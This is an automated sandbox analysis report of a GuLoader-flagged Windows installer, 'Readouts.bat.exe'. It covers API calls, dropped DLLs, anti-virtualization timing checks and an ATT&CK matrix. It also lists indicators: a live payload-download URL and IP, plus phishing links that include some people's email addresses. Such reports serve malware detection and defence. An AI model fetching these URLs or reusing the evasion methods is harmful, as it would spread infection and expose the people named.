Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kkaou.lamd.shop/ts.binA
Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kkaou.lamd.shop/ts.binL
Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kkaou.lamd.shop/ts.binN
Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kkaou.lamd.shop/ts.binQ
Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kkaou.lamd.shop/ts.binf
Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kkaou.lamd.shop/ts.binj
Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kkaou.lamd.shop/ts.binmd.shop/ts.bin
Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kkaou.lamd.shop/ts.binmswsock.dll.mui(M&L
Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kkaou.lamd.shop/ts.bino
Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kkaou.lamd.shop/ts.binwshqos.dll.mui
Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kkaou.lamd.shop/ts.binwshqos.dll.muin%
Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kkaou.lamd.shop/ts.binx
Source: Readouts.bat.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Readouts.bat.exe, 00000004.00000001.2161659320.0000000000649000.00000008.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Readouts.bat.exe, 00000004.00000001.2161659320.00000000005F2000.00000008.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Readouts.bat.exe, 00000004.00000001.2161659320.00000000005F2000.00000008.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: Readouts.bat.exe, 00000004.00000001.2161659320.0000000000649000.00000008.00000001.01000000.00000009.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214

Source: C:\Users\user\Desktop\Readouts.bat.exe

Code function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040542B

Source: C:\Users\user\Desktop\Readouts.bat.exe

Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403359

Source: C:\Users\user\Desktop\Readouts.bat.exe	File created: C:\Windows\resources\0809			Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	File created: C:\Windows\resources\0809\mysterist.ini			Jump to behavior

Source: C:\Users\user\Desktop\Readouts.bat.exe	Code function: 0_2_00404C68	0_2_00404C68
Source: C:\Users\user\Desktop\Readouts.bat.exe	Code function: 0_2_0040698E	0_2_0040698E
Source: C:\Users\user\Desktop\Readouts.bat.exe	Code function: 0_2_6FBF1B63	0_2_6FBF1B63

Source: Readouts.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal76.troj.evad.winEXE@3/9@1/1

Source: C:\Users\user\Desktop\Readouts.bat.exe

0_2_00403359

Source: C:\Users\user\Desktop\Readouts.bat.exe

Code function: 0_2_004046EC GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046EC

Source: C:\Users\user\Desktop\Readouts.bat.exe

Code function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

0_2_00402104

Source: C:\Users\user\Desktop\Readouts.bat.exe

File created: C:\Users\user\AppData\Local\Temp\nslC15B.tmp

Jump to behavior

Source: Readouts.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Readouts.bat.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Readouts.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Readouts.bat.exe	ReversingLabs: Detection: 13%
Source: Readouts.bat.exe	Virustotal: Detection: 20%

Source: C:\Users\user\Desktop\Readouts.bat.exe

File read: C:\Users\user\Desktop\Readouts.bat.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Readouts.bat.exe "C:\Users\user\Desktop\Readouts.bat.exe"
Source: C:\Users\user\Desktop\Readouts.bat.exe	Process created: C:\Users\user\Desktop\Readouts.bat.exe "C:\Users\user\Desktop\Readouts.bat.exe"
Source: C:\Users\user\Desktop\Readouts.bat.exe	Process created: C:\Users\user\Desktop\Readouts.bat.exe "C:\Users\user\Desktop\Readouts.bat.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\Readouts.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Readouts.bat.exe

File written: C:\Windows\Resources\0809\mysterist.ini

Jump to behavior

Source: Readouts.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: Readouts.bat.exe, 00000004.00000001.2161659320.0000000000649000.00000008.00000001.01000000.00000009.sdmp
Source:	Binary string: mshtml.pdbUGP source: Readouts.bat.exe, 00000004.00000001.2161659320.0000000000649000.00000008.00000001.01000000.00000009.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.2169579435.0000000005D35000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3529994044.0000000002115000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Readouts.bat.exe

Code function: 0_2_6FBF1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6FBF1B63

Source: C:\Users\user\Desktop\Readouts.bat.exe

Code function: 0_2_6FBF2FD0 push eax; ret

0_2_6FBF2FFE

Source: C:\Users\user\Desktop\Readouts.bat.exe	File created: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Readouts.bat.exe	File created: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\LangDLL.dll			Jump to dropped file

Source: C:\Users\user\Desktop\Readouts.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Readouts.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Readouts.bat.exe	API/Special instruction interceptor: Address: 607D26D
Source: C:\Users\user\Desktop\Readouts.bat.exe	API/Special instruction interceptor: Address: 245D26D

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Readouts.bat.exe	RDTSC instruction interceptor: First address: 603B871 second address: 603B871 instructions: 0x00000000 rdtsc 0x00000002 test ch, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FF65105882Dh 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a jmp 00007FF65105888Bh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Readouts.bat.exe	RDTSC instruction interceptor: First address: 241B871 second address: 241B871 instructions: 0x00000000 rdtsc 0x00000002 test ch, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FF65079654Dh 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a jmp 00007FF6507965ABh 0x0000000c rdtsc

Source: C:\Users\user\Desktop\Readouts.bat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Readouts.bat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\LangDLL.dll			Jump to dropped file

Source: C:\Users\user\Desktop\Readouts.bat.exe TID: 2128

Thread sleep time: -80000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Readouts.bat.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Readouts.bat.exe	Code function: 0_2_004065C7 FindFirstFileW,FindClose,	0_2_004065C7
Source: C:\Users\user\Desktop\Readouts.bat.exe	Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405996
Source: C:\Users\user\Desktop\Readouts.bat.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868

Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW/j
Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Readouts.bat.exe	API call chain: ExitProcess graph end node			graph_0-4984
Source: C:\Users\user\Desktop\Readouts.bat.exe	API call chain: ExitProcess graph end node			graph_0-4976

Source: C:\Users\user\Desktop\Readouts.bat.exe

Code function: 0_2_00401E49 LdrInitializeThunk,ShowWindow,EnableWindow,

0_2_00401E49

Source: C:\Users\user\Desktop\Readouts.bat.exe

Code function: 0_2_6FBF1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6FBF1B63

Source: C:\Users\user\Desktop\Readouts.bat.exe

Process created: C:\Users\user\Desktop\Readouts.bat.exe "C:\Users\user\Desktop\Readouts.bat.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Readouts.bat.exe

0_2_00403359

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	23 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Readouts.bat.exe	13%	ReversingLabs
Readouts.bat.exe	21%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsrC488.tmp\LangDLL.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll	3%	ReversingLabs

Source	Detection	Scanner	Label
http://kkaou.lamd.shop/ts.binmswsock.dll.mui(M&L	100%	Avira URL Cloud	malware
http://kkaou.lamd.shop/ts.bin-2476756634-1002	100%	Avira URL Cloud	malware
http://kkaou.lamd.shop/ts.bino	100%	Avira URL Cloud	malware
http://kkaou.lamd.shop/ts.binL	100%	Avira URL Cloud	malware
http://kkaou.lamd.shop/ts.binN	100%	Avira URL Cloud	malware
http://kkaou.lamd.shop/ts.binj	100%	Avira URL Cloud	malware
http://kkaou.lamd.shop/ts.bin)	100%	Avira URL Cloud	malware
http://kkaou.lamd.shop/ts.binQ	100%	Avira URL Cloud	malware
http://kkaou.lamd.shop/ts.bin	100%	Avira URL Cloud	malware
http://kkaou.lamd.shop/ts.binmd.shop/ts.bin	100%	Avira URL Cloud	malware
http://kkaou.lamd.shop/ts.binwshqos.dll.muin%	100%	Avira URL Cloud	malware
http://kkaou.lamd.shop/ts.binx	100%	Avira URL Cloud	malware
http://kkaou.lamd.shop/ts.binf	100%	Avira URL Cloud	malware
http://kkaou.lamd.shop/ts.bin%	100%	Avira URL Cloud	malware
http://kkaou.lamd.shop/ts.binwshqos.dll.mui	100%	Avira URL Cloud	malware
http://kkaou.lamd.shop/ts.binA	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
kkaou.lamd.shop	172.93.121.126	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kkaou.lamd.shop/ts.bin	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://kkaou.lamd.shop/ts.binmswsock.dll.mui(M&L	Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://kkaou.lamd.shop/ts.bino	Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://kkaou.lamd.shop/ts.binN	Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://kkaou.lamd.shop/ts.bin-2476756634-1002	Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://kkaou.lamd.shop/ts.binL	Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A5C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	Readouts.bat.exe, 00000004.00000001.2161659320.00000000005F2000.00000008.00000001.01000000.00000009.sdmp	false		high
http://kkaou.lamd.shop/ts.binj	Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://kkaou.lamd.shop/ts.bin)	Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://kkaou.lamd.shop/ts.binQ	Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A5C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	Readouts.bat.exe, 00000004.00000001.2161659320.0000000000649000.00000008.00000001.01000000.00000009.sdmp	false		high
http://kkaou.lamd.shop/ts.binmd.shop/ts.bin	Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	Readouts.bat.exe, 00000004.00000001.2161659320.00000000005F2000.00000008.00000001.01000000.00000009.sdmp	false		high
http://www.ftp.ftp://ftp.gopher.	Readouts.bat.exe, 00000004.00000001.2161659320.0000000000649000.00000008.00000001.01000000.00000009.sdmp	false		high
http://kkaou.lamd.shop/ts.binwshqos.dll.muin%	Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://nsis.sf.net/NSIS_ErrorError	Readouts.bat.exe	false		high
http://kkaou.lamd.shop/ts.binx	Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://kkaou.lamd.shop/ts.binf	Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://kkaou.lamd.shop/ts.bin%	Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://kkaou.lamd.shop/ts.binwshqos.dll.mui	Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://kkaou.lamd.shop/ts.binA	Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.93.121.126	kkaou.lamd.shop	United States		393960	HOST4GEEKS-LLCUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562049
Start date and time:	2024-11-25 07:14:50 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Readouts.bat.exe
Detection:	MAL
Classification:	mal76.troj.evad.winEXE@3/9@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 82% Number of executed functions: 47 Number of non-executed functions: 32
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.93.121.126	Payment Advice Note_Pdf.exe	Get hash	malicious	Azorult, GuLoader	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HOST4GEEKS-LLCUS	https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com	Get hash	malicious	Unknown	Browse	185.221.216.102
	https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com	Get hash	malicious	Unknown	Browse	185.221.216.102
	https://mkwomens.com/iuefoiuherjhkjf/iuyrijkfjkoifjoijreiwiw/e9c4710345f07b1cf048900d092f8cdc/YW5nZWxhLnN1bW1lcnNieUBhc2h1cnN0LmNvbQ==	Get hash	malicious	Unknown	Browse	172.93.120.13
	https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//colignymart.com/kiloa/memei/QepXS7lFNwbUolrMPBrA5Cn1RJP/a3Jpa29yLnllbWVuamlhbkBzcnMuZ292&..=c&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo	Get hash	malicious	Unknown	Browse	172.93.120.138
	https://LJpPCV.us8.list-manage.com/track/click?u=e9500d6fdb7f438633b429d1c&id=4450af0bff&e=c4b439d238	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	185.221.216.128
	https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse	185.221.216.128
	https://www.google.com/url?q=https%3A%2F%2Ftrimmer.to%2FPlfGc&sa=D&sntz=1&usg=AOvVaw1DTVuO2H6PM4yLoWCUd_D9	Get hash	malicious	HTMLPhisher	Browse	172.93.120.113
	https://m.exactag.com/cl.aspx?extProvApi=sixt-crm_newsletter&extProvId=313&extPu=nl_rac_de&extLi=DE_COR_RENT_CRM_B2C_24_CW33_From%20Intermediate%20Push_ONT_NLW_de_DE_Streichpreis_138402&extCr=Footer_rent&extSi=nl_rac_de_2408_DE&url=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%76%69%64%79%61%73%61%67%61%72%2D%70%74%74%69%2E%69%6E%2F%77%61%2F%66%61%2Fsgmflefb4v8va/%2F/bWF0dGhldy5kYXZpc0BtYnUuZWR1	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	172.93.120.138
